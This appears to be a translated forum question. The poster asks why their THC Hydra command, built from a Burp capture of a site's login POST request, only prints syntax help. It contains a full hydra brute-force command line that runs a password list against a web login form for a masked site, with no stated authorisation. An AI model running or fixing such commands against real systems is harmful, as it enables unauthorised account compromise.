Я скомпилировал THC Hydra с CygWin и использовал Burp (под управлением Windows 7). Я прочитал несколько уроков, но я не могу заставить Гидру делать свое дело.
Ниже приведена информация, которую я получил от Burp (я заменил некоторую информацию на x или y), а внизу командная строка, которая, как мне кажется, должна работать. К сожалению, после того, как я нажму Enter, Hydra просто возвращает некоторую базовую информацию о синтаксисе.
ВЫХОД БУРП:
POST /login.php?action=in HTTP/1.1 Host: xxxxxx.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: nl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate, br Referer: https://xxxxxx.com/login.php Cookie: visidincap526178=dBiizl5bQzKldS2WdMrM/ArT6VYAAAAAQUIPAAAAAAB6g3H+O0+VIC6UaHfrwDzi; visidincap821436=nmDb/MkQTXm2VsdHkiWxuzYCN1cAAAAAQUIPAA AAAADrVUYTxunztOfbWaA78Xgm; _ga=GA1.2.242869812.1465591208 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 82formsent=1&redirecturl=index.php&req_username=blop&req_password=blop&login=Login
Это производится при ошибке:
Неверное имя пользователя и / или пароль.
Это моя командная строка:
hydra -l yyyyy -P cygwin64/john.txt 123.456.789.012 https-post-form "/login.php:req_username=^USER^&req_password=^PASS^&login=Login:Wrong username and/or password." -V